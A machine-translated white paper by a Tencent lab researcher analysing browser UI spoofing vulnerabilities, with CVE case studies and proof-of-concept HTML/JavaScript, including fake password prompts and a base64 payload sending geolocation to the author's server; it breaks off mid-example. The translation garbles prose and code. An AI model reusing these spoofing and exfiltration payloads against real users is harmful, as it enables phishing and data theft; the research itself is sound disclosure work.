Browser UI Security Technical White Paper

Tencent basaltic laboratory xisigr

2017/10/16
table of Contents

1 UI Spoof Outline .................................................. .................................................. ......... 2

1.1 Address Bar Spoofing .................................................. .................................................. ..... 3

1.2 Dialog deceive .................................................. .................................................. ..... 5

1.3 The status bar spoofing .................................................. .................................................. ..... 6

2 UI Spoof Detailed real case .................................................. .............................................. 7

2.1 Address Bar Spoofing + multiple security mechanisms to bypass ( CVE-2015-3755 ) ................................. 7

2.2 Dialog + display spoofed source ( CVE-2015-7093 ) .................................................. ... 9

2.3 Location deceive certification authority ( CVE-2016-1779 ) ............................................. 12

2.4 Blob-URLs deceive( CVE-2016-5189 with CVE-2016-7623 ) ......................... 18

2.5 Colon: triggered Address Bar Spoofing ( CVE-2016-1707 ) ............................................ twenty two

2.6 Right-click on the address bar spoofing triggered ( CVE-2016-5222 ) ..................................... 25

2.8 Dialog window size as a result of deception ( CVE-2016-7592 ) ................................. 26

2.9 Right to left ( RTL) Direction URL Deception ( CVE-2017-5072) ..................................... 29

2.10 Internationalized Domain Names deceive ( CVE-2017-5060 ) .................................................. ....... 30

2.11 Search engine triggered the address bar spoofing ( CVE-2017-2517 ) ...................................... 32

2.12 Browser status bar spoofing .................................................. ...................................... 33

3 future .................................................. .................................................. .......................... 37

1/41
 Browser UI, It refers to the browser user interface. Browser After decades of development, the user interface does not have a

Uniform requirements standard, most modern browsers user interface include: forward and back buttons, refresh and stop raising

Upload button, address bar, status bar, the page display window, view the source code window, labels. There may also have some

Other user interfaces, such as Download Manager, page search, notifications, system management options, incognito windows and so on. We can

To the Browser UI Believed to be a front-end manager tabbed page or Web Shell, users do not have to consider Liu

How to look at the underlying application is processing data, all network behavioral outcomes, by Browser UI Go to a show

Households.

From a security point of view, the browser UI The most prone to attacks is to deceive the user interface, that is, UI Spoof .

usually UI Spoof It is used for phishing attacks use. Phishing is a social engineering are used to trick users into

And access to sensitive information of the user a means of attack, usually use fake websites to lure users from the visual senses

I believe it is a legitimate, bona fide, when the user operates the browser, sensitive information is likely to be the attacker to get.

So the browser UX In the development team UI Process, convenient user while browsing on UI On the security model

Design, strategy, logic is very important, safe UI It can help users quickly and accurately make the right while online

Security decisions. and UI Once the defects, an attacker could forge browser UI In certain key information into

And for users to implement phishing attacks.

This white paper will tell you what is in UI Spoof Vulnerabilities, and multiple browsers UI Security loopholes

For detailed analysis.

1 UI Spoof Outline

UI Spoof The user interface is spoofing, phishing is often used to use, this allows the user to attack by visual

Feel tricked into making an insecure network behavior. In the browser address bar, status bar, dialog boxes, usually the most vulnerable UI

Spoof The place. For users UX Is a purely subjective experience, so browser UI Safety design, for each

Front-end UI Module position, size, color, and other features, all require careful planning and consideration, especially in the small screen

The mobile browser, every inch of pixels browser UI It is precious. Imagine a credible pixels, if you can

It is controlled by the attacker, resulting in arbitrary pseudo UI Content, including fake browser itself UI Modules, which are very dangerous thing

2/41
situation. In the browser UI In FIG. 1 Some called "dead line shown in FIG. 1 "Borders, such as the top of the browser

URL The address bar, this part is completely controlled by the browser, but also allows users to fully trust UI Module. The dead line

Address bar located at the junction of the page display, if you trust in Dead Man Walking pixels or more, then it would be safe, anti

It will be "dead."

Map 1

1.1 Address Bar Spoofing

Address Bar Spoofing Vulnerability, forged Web The most basic security boundary, source ( orgin) . Web The protocol comprises a source, a main

Machines and ports, three caught the same express homology. In modern browsers UI In the address bar of deliberately weakening the protocols and ports

The show, which take into account ordinary users do not understand the source concept. such as http://www.163.com:80 , Chrome Address Bar

shown as www.163.com ,front end UI The display does not affect the parsing of the underlying source. So, we can only believe

To forge the host (and domain name IP ), Is an address bar spoofing vulnerability.

Google He made it clear that: "We recognize that modern browser address bar is the only reliable indicator of safety." Also

That is, if the address bar spoofing occurs, then all users to follow Web Trust page content will all collapse.

In the browser address bar, URL Initially only support ASCII Character, and later introduced Unicode Character Set for support

Any language in the world. but Unicode Character set is very large, which brings together all of the coding world,

Currently available character has more than ten million units and growing. In the browser address bar into these strange coding

When the line of sight rendering process, appearance and character of the display order may be user-generated fraud.

in Unicode There are a lot of similar character, sometimes two different Unicode String, small size resolution

Screen, which are difficult to distinguish in appearance. For example slash " ( U + 2216) "with"\( U + FF3C) "While they function

1 https://textslashplain.com/2017/01/14/the-line-of-death/

3/41
Different but very similar appearance. English characters a ( U + 0061 ) 2 From Table 1 Can be seen, there are many similar characters.

a 61 LATIN SMALL LETTER A

251 LATIN SMALL LETTER ALPHA

03B1 GREEK SMALL LETTER ALPHA

430 CYRILLIC SMALL LETTER A

237A APL FUNCTIONAL SYMBOL ALPHA

1D41A MATHEMATICAL BOLD SMALL A

1D44E MATHEMATICAL ITALIC SMALL A

1D482 MATHEMATICAL BOLD ITALIC SMALL A

1D4B6 MATHEMATICAL SCRIPT SMALL A

1D4EA MATHEMATICAL BOLD SCRIPT SMALL A

1D51E MATHEMATICAL FRAKTUR SMALL A

1D552 MATHEMATICAL DOUBLE-STRUCK SMALL A

1D586 MATHEMATICAL BOLD FRAKTUR SMALL A

1D5BA MATHEMATICAL SANS-SERIF SMALL A

1D5EE MATHEMATICAL SANS-SERIF BOLD SMALL A

1D622 MATHEMATICAL SANS-SERIF ITALIC SMALL A

1D656 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL A

1D68A MATHEMATICAL MONOSPACE SMALL A

1D6C2 MATHEMATICAL BOLD SMALL ALPHA

1D6FC MATHEMATICAL ITALIC SMALL ALPHA

1D736 MATHEMATICAL BOLD ITALIC SMALL ALPHA

1D770 MATHEMATICAL SANS-SERIF BOLD SMALL ALPHA

1D7AA MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL ALPHA

a FF41 FULLWIDTH LATIN SMALL LETTER A

table 1

In addition to coding issues, the two characters in the address bar displays "Where are you (current URL ) And you're going (about to navigation

of URL ) ", In competition with each other, when the interchangeable due to some logical error which led to the deception.

E.g: t = window.open ( 'http://www.google.com'); t.document.write ( 'spoofing'); t.stop () . in

Early certain browsers, this code can cause an address bar spoofing.

In the mobile browser address bar UI Display can be called megapixel race, because the mobile terminal screen is too small. Long

URL Problems may arise will display the address bar. No matter how small the address bar visual space, we are sure to follow display true

2 https://unicode.org/cldr/utility/confusables.jsp?a=a&r=None

4/41
The principle is the source of 3 .

For example: a malicious attacker released URL https://login.your-bank.com.evil.com/login.your-bank.com

Map 2

Figure 2 The last two shown in the address bar shows the policy is wrong. The first one is showing URL The far left, only

It shows part of a multi-level domain name; the second strategy is to only show URL The far right, shows URL of

pathname section. This two display modes, are not the real source displayed evil.com The user will believe that the current visit

Q site is a login.your-bank.com .

In modern browsers, the address bar in addition to the current page URL Type the user to navigate and acceptance of URL These ones

Outside the most basic functions, but also added a lot of new functions and responsibilities, for example, most browsers have the address bar

And search bar into one, vulgar saying smart address bar, it may be due to this design URL And search logic presence upmix

Chaos and lead to address bar spoofing.

1.2 Dialog deceive

A warning dialog box ( alert ()) , Confirmation dialog ( confirm ()) Prompt dialog box ( prompt ()) It is the most commonly used browser

Three important dialog. The dialog box for warnings, or prompt the user to enter information. In addition, some of its browser

His function will trigger a number of its own dialog box prompts, such as geopositioning ( Geolocation API) Authentication dialog,

notification( Notification API) The dialog boxes. On most dialog deception, by its pop-up window in a non-boot

3 https://www.chromium.org/Home/chromium-security/enamel

5/41
Or forged source display triggered. In addition, if the dialog box you can insert any content, will significantly enhance the success rate of deception.

Non-launch pop-up window

Here is a simple example, such as access to the site www.xisigr.com Will pop up a warning dialog box, then the dialog box

That is, by the xisigr.com Domain derived, xisigr.com It is to start the window. If we can make this dialog

google.com Domain pop-up, then this dialog is the cross-domain, and here google.com It is a non-startup window.

Forged source display

For the dialog display source, such as from www.xisigr.com Pop up a dialog box usually considerably on

Source information shows, displayed normal www.xisigr.com . If you change the source, to make it appear as www.google.com , Which

Forged source information display. And this is a bypass the same origin policy.

For those dialog box does not show the source of information, if the dialog box text can be injected even line breaks (\ r \ n ),that

What an attacker could inject www.google.com Such a string, and adjust the display position so that it appears to be the primary dialog

Source state information, so as to achieve the purpose of deception.

1.3 The status bar spoofing

Modern browsers, the status bar is usually not automatically appear in the main page window. Only when the page is loaded or display the link address

When the surface, the status bar will emerge in the lower left corner of the browser window. Deception on the status bar are the following:

( 1 ) When the mouse moves over the link, the status bar displays A address. When you click the link, steering B address. The party

Method using a script can be easily achieved. E.g:

<a onclick="location='//B.com';return false;" href="//A.com"> A.com </a>

Of course, this is not a loophole problem, just a little trick. And the browser has long been party to support this process

formula.

( 2 )use CSS Draw a original ecological status bar. in CSS3 It adds support rounded corners and shadow, which makes

We can use CSS Draw a browser exactly the same and the status bar, in turn, can have an effect deceive the user.

The problem from a security perspective, the potential security risk is not so obvious. But still I want to throw this author

The topic of discussion: the browser when the original ecology UI When can be fully simulated user scripts, fraud might occur.

6/41
2 UI Spoof Detailed real case

2.1 Address Bar Spoofing + multiple security mechanisms to bypass ( CVE-2015-3755 )

CVE-2015-3755 The authors found that a bypass Webkit Multiple security vulnerabilities, causes vulnerability Webkit

Parsing URL Port number of the logical error caused when, after an attacker can exploit URL Address Bar Spoofing attack

Strike, and can bypass the same-origin policy dialog box displays the source, and bypass the address bar HTTPS Security lock protection mechanism.

Affected Products: Apple Safari <8.0.8, Apple Safari <7.1.8, Apple Safari <6.2.8, iOS <8.4.1

Vulnerability Announcement:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3755

Well, this vulnerability is how did this happen? We look directly CVE-2015-3755 of POC .

<A href = "https://www.gmail.com:443." Target = "aa"

onclick = "setTimeout ( 'fake ()', 100)"> <h1> click me </ h1> </a>

<Script>

function fake () {

var t = window.open ( 'javascript: alert (1)', 'aa');

t.document.body.innerHTML = '<title> Gmail </ title> <H1> Fake Page !!! - hack by

xisigr </ H1> ';

</ Script>

The above code is saved as test.html ,E.g: http://www.xisigr.com/test.html . Then in the affected version

Run. Figure 3 It is the author of the illustrated iOS Version Safari Running results, URL Deceive + source dialog box is displayed bypass

+ Https Safety lock mechanism bypassed.

7/41
 Map 3

We know that the scope of the network system port number: port is empty, or 16 Bit unsigned integer. The browser parses

URL When, wherein the port number if errors are found, for example, non-numeric, typically to pre-defined system error

page. Our POC To be accessed URL Is such that:

https://www.gmail.com:443.

This is an abnormal number of port URL . Safari Browser in dealing with this exception, there was a logic error. finally

Stay in the address bar displays www.gmail.com And we can to page DOM Proceed as follows:

var t = window.open ( 'javascript: alert (1)', 'aa');

t.document.body.innerHTML = '<title> Gmail </ title> <H1> Fake Page !!! - hack by

xisigr </ H1> ';

when alert (1) When the pop-up dialog box displays the source https://www.gmail.com . Here dialog box displays the source of bypass

The same-origin policy, because in fact the current field or xisigr.com . If the code is changed alert (document.domain) ,

Will glance. Figure 4 Fig.

8/41
 Map 4

At the same time there are also bypassed Safari Determine the safety lock mechanism identified. We know that if access is https protocol

The site, the browser displays security lock logo in the address bar. This can quickly tell the user, the network you are visiting

Station transmission is encrypted and is safe. But our visit here was a mistake unencrypted URL , but Safari Still

However, it shows the security lock logo.

2.2 Dialog + display spoofed source ( CVE-2015-7093 )

Repair the CVE-2015-3755 After this loophole, Safari Will be in iOS The system was abolished dialog source

Shows. For example, run this code:

<Button onclick = alert (1)> Click me </ button>

Click on Click me Will be playing a alert (1) The dialog boxes that UI It will only display " 1 "Without the active

Display. and Chrome with Firefox Dialog box displays the source. Figure 5 Below:

9/41
 Map 5

The dialog box displays the source, this would comply with a normal security logic. I do not know why Safari In the repair complete CVE-

2015-3755 After this loophole, the dialog would do such a treatment. No source is displayed, will increase the risk of deception

Plus, on this point will be explained in detail later in vulnerability analysis.

CVE-2015-7093 This vulnerability is the author of discovery in this case. Causes of vulnerability, in Safari Dialogue

Box to start the non-pop-up window, and the dialog UI It can be injected in the content, to display the forged source. An attacker who exploited this

Vulnerabilities, phishing attacks can be launched to the user.

Affected Products: Apple Safari, Apple iOS <9.2

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7093

CVE-2015-7093 of POC:

Save the following code: http://test.com/1.html

<Html>

<a href=2.html target='_blank'> click me </a>

</ Html>

Save the following code: http://test.com/2.html

10/41
 <Html>

<Body>

<Script>

location = 'https: //www.google.com';

function go () {

if (window.opener) {

window.opener.location = 'data: text / html, <title> test </ title> <script>' +

'Pass = prompt ( "https://google.com \ NType your password: \ n "); '+

'Alert ( "Your Password is:" + pass);' +

'<\ / Script>';

}}

go ();

</ Script>

</ Body>

</ Html>

in Safari Run http://test.com/1.html ,then click Click me Button when the user enters in the dialog box

After the information is likely to be stolen. The results are shown running 6 , The user input in the dialog box 123 :

Map 6

We gradually dismantling POC Code, further analysis of how this is achieved spoofing attack. First of all, we have to

There are clear 2 Pages window, the window A for www.test.com/1.html ,window B for www.test.com/2.html . window

mouth A The window B The parent window.

11/41
 window B The code is mainly completed 2 Function.

(1) When the window is opened B, navigate to https://www.google.com .

Code: location = 'https: //www.google.com';

(2) A parent window dialog box.

Code:

window.opener.location =

'Data: text / html, <title> test </ title> <script> pass = prompt ( "https: // go

ogle.com \ NType your password: \ n "); alert (" Your

Password is: "+ pass); </ script> ';

in B To navigate to the window https://www.google.com when, A In the dialog box window B Window significant

Show this dialog box is blocked B Navigate to the window https://www.google.com, It is in a wait state. This

The results shown are formed deception previous figure. And the attacker to insert the contents of the more deceptive effect in the dialog box, forgery

The source display.

2.3 Location deceive certification authority ( CVE-2016-1779 )

In addition to the browser alert () / prompt () / confirm () Outside the box, there are some Web API On self-generated

Dialog box, such as geopositioning ( Geolocation API) Authentication dialog box, message notification ( Notification API) The dialog boxes, etc.,

These consist Web API Derived from the dialog box, there are also risks of deception.

CVE-2016-1779 This vulnerability is caused by a geolocation authentication dialog. Geolocation API It is used

The host device to get the user's location, and it has a comprehensive mechanism to protect user privacy 4 . To use geographic

Positioning the user must be licensed before they can, unless it has been previously confirmed the trust relationship. Browser in use

Geolocation API When it will pop up a box to notify the user authentication, and certification in this box UI On this page must contain

Surface URL . CVE-2016-1779 This vulnerability may allow a remote attacker to bypass the same origin policy in any domain authentication boxes bomb

Out, and the user can obtain the geographic location When the user clicks allowed.

Affected Products: Apple iOS <9.3, Apple Safari <9.1

4 https://www.w3.org/TR/geolocation-API/#security

12/41
 Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1779

trigger Geolocation Authentication box is very simple, as long as we can run the following code, the premise is not allowed before

Xu current domain acquisition Geolocation .

<Script>

function success (position) {}

navigator.geolocation.getCurrentPosition (success);

</ Script>

E.g: http://www.test.com/geo.html . After the run, the browser will pop up authentication dialog on the current page,

Dialog UI Source will be on display: www.test.com .

From this box triggers the authentication process, the author had the following thoughts.

1. You can change the source of authority.

2. If you can change, it can be empty.

Thus, according to this idea, continue testing. In the process, I found iOS under Safari with Chrome in

use data: When parsing code, authentication source will be ": //." Figure 7 Fig.

data: text / html; base64, PHNjcmlwdD4KZnVuY3Rpb24gc3VjY2Vzcyhwb3NpdGlvbikge30

KbmF2aWdhdG9yLmdlb2xvY2F0aW9uLmdldEN1cnJlbnRQb3NpdGlvbihzdWNjZXNzKTsKPC9zY3J

pcHQ + Cg ==

13/41
 Map 7

Next, the author further optimized POC .

<Title> test </ title>

<Script>

function geo () {

window.open ( 'http://www.google.com');

location =

'Data: text / html; base64, PCFET0NUWVBFIGh0bWw + CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ

+ CjxtZXRhIGNoYXJzZXQ9dXRmLTggLz4KPHRpdGxlPmdlb2xvY2F0aW9uPC90aXRsZT4KPGJvZHk

+ CjxzY3JpcHQ

+ CmZ1bmN0aW9uIHN1Y2Nlc3MocG9zaXRpb24pIHsKZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3J

lbW90ZScpLnNyYz0iaHR0cDovL3hpc2lnci5jb20vdGVzdC9nZW8v

Z2V0LnBocD9nZW9sb2NhdGlvbj0iKyItLS0tLS0iK2VuY29kZVVSSUNvbXBvbmVudChwb3NpdGlv

bi5jb29yZHMubGF0aXR1ZGUpKyIsIitlbmNvZGVVUklDb21wb25lb

nQocG9zaXRpb24uY29vcmRzLmxvbmdpdHVkZSk7CiB9Cm5hdmlnYXRvci5nZW9sb2NhdGlvbi5nZ

XRDdXJyZW50UG9zaXRpb24oc3VjY2Vzcyk7Cjwvc2NyaXB0Pgo8aW

1nIGlkPSJyZW1vdGUiIHNyYz0iIiB3aWR0aD0wIGhlaWdodD0wPgo8L2JvZHk + CjwvaHRtbD4 = ';

14/41
}

</ Script>

<Button onclick = 'geo ()'> Click Me </ button>

among them Base64 The decrypted code as follows:

<! DOCTYPE html>

<Html lang = "en">

<Head>

<Meta charset = utf-8 />

<Title> geolocation </ title>

<Body>

<Script>

function success (position) {

document.getElementById ( 'remote'). src = "http://xisigr.com/test/geo/get.php?ge

olocation = "+" ------

"+ EncodeURIComponent (position.coords.latitude) +", "+ encodeURIComponent (positi

on.coords.longitude);

navigator.geolocation.getCurrentPosition (success);

</ Script>

<Img id = "remote" src = "" width = 0 height = 0>

</ Body>

</ Html>

After the results of running the above code, FIG. 8 Fig.

15/41
 Map 8

Remember earlier we said "Source on the certification box displays must be the source of the current page and the same." At this point, we

Has successfully bypass the same origin policy, the data: Domain Geolocation Source authentication pop-up window in a non-start, is formed of a

A certification frame spoofing attacks. When the user clicks allow, the system does not check certification UI Sources and sources on the current page is

No same, so the location is sent to the attacker's server.

Here there are about CVE-2016-1779 The little story to share. The authors of this loophole to submit

APPLE Shortly after the company, in 2016/1/6 , I received some feedback information on the location of the server. Because mention

Post POC Already clear that the use of their own servers built a vulnerability verification environment, if triggered, data

It will spread to the author's server. Figure 9 Fig.

16/41
 Figure 9

After reviewing discovery, 37.332578830316436, -122.03068509201906, Display of official Apple Of the total US

Address. Figure 10 Fig.

10

17/41
 It is found from the acquired data is returned, the researchers were at Apple 2016/1/6 , 2016/1/7 , 2016/1/8 ,

2016/1/10 , 2016/1/20 , 2016/1/22 , 2016/1/28 This 7 Time periods triggered POC , And the address is the same,

Apple is based in the United States. Apple was possible to verify the researchers, did not build their own vulnerability verification environment, but

Direct use provided by the author POC The original environment, resulting in validation vulnerability back to a time location

On the author's server.

Apple security personnel should be aware of this problem, because in POC Clearly states that data will be back to this address

xisigr.com/test/geo/info.txt . However, they are triggered or continuous 7 Second vulnerability is negligent or does not care

Apple's headquarters location is leaked out, although this address on the Internet can be found any. But even so, for

Who is still very surprised, geographic Apple testers and their work schedules, and it was to get up.

This of course is not just a story, just want to remind you that in real sophisticated cyber attack, the letter clues

Interest rates can sometimes be a breakthrough, "thousands of miles of dikes destroyed the colony," the. Do not let such an important geographical position similar to private information

Easily let the attacker get to.

2.4 Blob-URLs deceive( CVE-2016-5189 with CVE-2016-7623 )

Versus " http "" https "" ftp "These types of common network URL scheme Local types URL scheme

Spoofing attack on also exist, and more likely to be overlooked by programmers and users. Local types URL scheme

Have" data "" about "" blob "" filesystem "" file . " CVE-2016-5189 its about" blob URLs "on

of URL Spoofing vulnerability. This vulnerability exists in Chrome Browser.

Affected Products: Google Chrome <54.0.2840.59 for Windows, Mac, Linux. 54.0.2840.85 for

Android

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5189

what is blob URLs

blob (binary large object) , Binary object, a container can store binary files. " blob URLs "

Scheme allows From Web Applications secure access to binary data, that is, from the "memory" of blob References.

One" blob URLs "Includes a host and a source of UUID The path indicated. blob = scheme ":" origin "/" UUID .

scheme always blob , origin It is generated blob URLs The source, UUID Defining a reference [ RFC4122] .

Usually you see blob URLs Like this:

18/41
 blob: https: //example.org/ea3527a8-134f-46ae-be03-421f067d97f0

Generate a blob URLs

URL.createObjectURL () It creates a static method DOMString ,its URL Represent parameters for

Like. This one URL Life cycle and create its window document Binding. This new URL Object represents

The specified File Object or Blob Object.

In each call createObjectURL () When the method will create a new URL Object, even if you already use

The same object as a parameter to create too. When no longer needed URL When objects, each must by calling

URL.revokeObjectURL () Method to release. The browser will automatically release them when the document exit, but in order to

Get the best performance and memory usage, you should take the initiative to relieve them in a safe opportunity.

Access in the browser, http://example.com/blob.html . Code is as follows:

<Script>

function aa () {

args = [ '123456'];

b = new Blob (args, {type: 'text / html'});

window.open (URL.createObjectURL (b));

</ Script>

<Button onclick = 'aa ()'> click me </ button>

in PC end Chrome , Safari , Firefox I click your browser click me Button will pop up a blob URLs

Types of pages, page content 123456 .

in Edge Browser, you can not execute the code. and, Edge in blob URLs This is so, there is no

origin this part: blob: 246AC85B-5A42-425B-A059-F8A41BC13122 .

blob URLs Cheat on

CVE-2016-5189 of POC Code is as follows:

<Script>

function pwned () {

var t = window.open ( '', 'ss');

t.document.write ( "<h1> phishing page </ h1> <title> google </ title>");

t.stop ();

19/41
 }

</ Script>

<A href = "blob: http: //www.google.com%EF%BE%A0............@xisigr.com" target = "ss"

onclick = "setTimeout ( 'pwned ()', '500')"> click me1 </a> <br>

<br>

<A href = "blob: http: //www.google.com ............@xisigr.com "target =" ss "

onclick = "setTimeout ( 'pwned ()', '500')"> click me2 </a> <br>

Click on Click me Button, as 11 Fig.

Map 11

Look POC The code is not difficult to find the key to this code URL in" www.google.com ... @ xisigr.com . "

This uses the @ symbol to join a domain name string before the real domain name www.google.com , And

www.google.com After adding a lot of white space characters. So the real domain name is hidden behind in the browser to

You can not see the address bar. Users will mistakenly believe that this is google.com Domain " blob URLs " , Resulting in a spoofing attack.

CVE-2016-7623 same with" blob URLs Spoofing Vulnerability on. "Loophole causes and CVE-2016-5189 similar,

Slightly different whitespace using% EF% B9% BA ( U + FE7A ), There is no longer much introduction. Figure 12 The

Shows.

Affected Products: iOS <10.2, Safari <10.0.2

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7623

20/41
 Map 12

CVE-2016-7623 PoC

-------- ------------
<Script>

function go () {

var t = window.open ( '', 'aaaa');

t.document.write ( "<h1> phising </ h1> <title> Google </ title>");

function ipad () {

var t =

window.open ( 'blob: http: //www.google.com'+Array (0x50) .join ( "% EF% B9% BA") +' @

xisigr.com ',' aaaa ');

setTimeout ( 'go ()', '500');

function iphone () {

var t =

window.open ( 'blob: http: //www.google.com'+Array (0x20) .join ( "% EF% B9% BA") +' @

xisigr.com ',' aaaa ');

setTimeout ( 'go ()', '500');

function blob () {

var blob = new Blob ([], {type: "text / html; charset = utf-8"});

var url = URL.createObjectURL (blob);

var t = window.open (url, 'aaaa');

if (navigator.userAgent.indexOf ( "iPhone")> -1) {

21/41
 setTimeout ( 'iphone ()', '500');

if (navigator.userAgent.indexOf ( "iPad")> -1) {

setTimeout ( 'ipad ()', '500');

</ Script>

<Button onclick = "blob ()"> Click me </ button>

CVE-2016-5189 with CVE-2016-7623 Both flaws are rendered Blob-URLs The user name and password Ministry

Points, which is extremely dangerous. One URL The username and password should not be rendered because they can be mistaken

One URL Host. E.g: https: //examplecorp.com@attacker.example/ .

2.5 Colon: triggered Address Bar Spoofing ( CVE-2016-1707 )

CVE-2016-1707 This vulnerability is in the author 2016 year 6 Monthly reports to Google one of iOS Version Chrome

Browser address bar spoofing vulnerability. This loophole has received a Google 3000 $ The vulnerability reward. Attack effect is shown 13

Fig.

Affected Products: Chrome <v52.0.2743.82 , iOS <v10

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1707

Map 13

22/41
 <Script>

payload = "PGJvZHk + PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50

LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206

Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNr

KCk7DQo8L3NjcmlwdD4 = ";

function pwned () {

var t = window.open ( 'https://www.gmail.com/', 'aaaa');

t.document.write (atob (payload));

t.document.write ( "<h1> Address bar says https://www.gmail.com/ - this

is NOT https://www.gmail.com/ </ h1> ");

</ Script>

<A href = "https://hack.com::/" target = "aaaa"

onclick = "setTimeout ( 'pwned ()', '500')"> click me </a> <br>

Now the entire loading process to interpret what the code. First click click me This link to open a browser

name for aaaa New window, to load this page https://hack.com :: This address can easily write. 500 Microsecond

After running pwned () ,in aaaa Window opens https://www.gmail.com Of course this URL It can be empty. Now

So far, everything is normal code is run, then this code is the core code to trigger the vulnerability.

base64 Encrypted code:

base64 payload code:

<Body> </ body>

<Script>

var link = document.createElement ( 'a');

link.href = 'https://gmail.com ::';

document.body.appendChild (link);

link.click ();

</ Script>

in aaaa Window page to submit ( commit ) https://gmail.com :: This is a very wonderful thing,

https://gmail.com :: This is an invalid address, how to be submitted to it. After trying a variety of methods, I found

use a Click on the tab of ways to do ( window.open/location Can not), and the address is not valid at this

In a wait state ( pending status) . At this point, the actual Chrome It is loaded about: blank (I have come to

about: blank Domain), but in the final process URL When displaying the address bar, Chrome But he chose to wait in a state of

https://gmail.com :: As a last address after submission, loaded https://gmail.com :: in URL The address bar will

https://gmail.com This presented two :: will be hidden. At this point, the entire loading process is complete. A perfect

URL Spoofing Vulnerability thus produced.

23/41
 How to fix

This vulnerability most critical areas that, Chrome Allows Web When the page loads, submitted an invalid address

As a result. Google This is also based on a given patch file is loaded Web When a page is not allowed to submit invalid

Address, if an invalid address is detected, then the direct current URL for about: blank .

// Ensure the URL is as expected (and already reported to the delegate).

- DCHECK (currentURL == _lastRegisteredRequestURL) // Just before the current judgment URL

And finally requested URL Are the same

+ // If | _lastRegisteredRequestURL | is invalid then | currentURL | will be

+ // "about: blank".

+ DCHECK ((currentURL == _lastRegisteredRequestURL) ||

+ (! _lastRegisteredRequestURL.is_valid () && // To determine whether the increase is an invalid

URL

+ _documentURL.spec () == [url :: kAboutBlankURL)] (url :: kAboutBlankURL)))

<< std :: endl

<< "currentURL = [" << currentURL << "]" << std :: endl

<< "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL <<

"]";

// This is the point where the document's URL has actually changed, and

// pending navigation information should be applied to state information.

[Self setDocumentURL: net :: GURLWithNSURL ([_ webView URL])];

- DCHECK (_documentURL == _lastRegisteredRequestURL);

+ if (! _lastRegisteredRequestURL.is_valid () &&

+ _documentURL! = _lastRegisteredRequestURL) {

+ // if | _lastRegisteredRequestURL | is an invalid URL, then

| _documentURL |

+ // will be "about: blank".

+ [[Self sessionController] updatePendingEntry: _documentURL];

+}

+ DCHECK (_documentURL == _lastRegisteredRequestURL ||

+ (! _lastRegisteredRequestURL.is_valid () &&

+ _documentURL.spec () == url :: kAboutBlankURL));

self.webStateImpl-> OnNavigationCommitted (_documentURL);

[Self commitPendingNavigationInfo];

if ([self currentBackForwardListItemHolder] -> navigation_type () ==

24/41
2.6 Right-click on the address bar spoofing triggered ( CVE-2016-5222 )

In the above CVE-2016-1707 This loophole, we use two consecutive colons (:) constructed wrong URL

Which led to the vulnerability to occur. CVE-2016-5222 This vulnerability still use this technique.

For Web Links page, we can use a variety of ways to open: left-click, right-click to play

Open a new window, drag and drop the link into the address bar. Click once on the left, you are a link to open the most frequently used method. The Right

Hit new window and drag and drop links, the method is less used, the designer is browser may ignore the security of

local. CVE-2016-5222 This loophole is another way, resulting in vulnerabilities occur when you use the right to open a new window.

Affected Products: Chrome <v55.0.2883.75 for Winows / MAC / Linux

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5222

We are at Chrome The following code running in a browser, it is a very simple code. Open, using the right point

Hit new window opens.

<a href="google.com::"> Click me </a>

Map 14

Figure 14 Can be found, although navigate to google.com Page, but the address bar URL You can see and

Usually not the same, google.com: . At that time I feel that this process URL When there may be some errors.

Next, I tried a different URL Submission method, finally found a can URL Spoof The mode of attack:

When the page automatically jump, jump is successful will navigate to the jump page, the address bar URL Not updated,

will not change. In other words, if you want to Google.com get on URL Spoof Just find a Google The re

25/41
To jump on it. Run the following code:

<A

href = "www.google.com :: / url? q = http% 3A% 2F% 2Fxisigr.com% 2Ftest% 2Fspoof% 2Fchrome

% 2F3.html & sa = D & sntz = 1 & usg = AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cw "> 22222 </a>

Right-click on the new window opens, from google.com Redirected to http://xisigr.com/test/spoof/chrome/3.html .

Figure 15 , The redirection action occurs, the address bar URL Still stuck in google.com , Finished spoofing attack

to make.

Map 15

2.8 Dialog window size as a result of deception ( CVE-2016-7592 )

From the above CVE-2016-5222 Vulnerabilities, we discussed different ways to open a Web page (left click,

Right open a new window, drag and drop links), it is not difficult to be inspired, to refine the various functions of the browser and then increase the attack surface,

The use of low-frequency multi-function security and defense is weakest. CVE-2016-7592 Also follow this line of thought, the

With custom window size has led to the occurrence of vulnerabilities.

26/41
 Affected Products: Apple Safari <10.0.2

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7592

Usually in mining URL Spoof Loopholes process, we constructed Payload Often used window.open () ,

But do not ignore window.open () Different parameters in the parameter, it will also increase the attack path.

Consider the following POC ,

<Script>

function phishing () {

aa = window.open ( 'http://www.google.com');

name = aa.prompt ( "Enter the name for google");

passwd = aa.prompt ( "Enter the password");

aa.alert ( "Your name is:" + name + "||" + "Your Password is:" + passwd);

aa.document.write ( "<h1> phishing </ h1>");

</ Script>

<Button onclick = "phishing ()"> Click me </ button>

for URL Spoof Loopholes, this POC Framework is very classic but also very common. Classic is to say in the early

URL Spoof Vulnerability, this POC Get rid of a lot of browser; common is that after some time, the browser early

This closure has been blocked POC .

Now we window.open () Increased parameters, start window pops up and change the window size. See below POC ,

===== CVE-2016-7529 =====

<Script>

function phishing () {

aa = window.open ( 'http: //www.google.com','new','width=800,height=600');

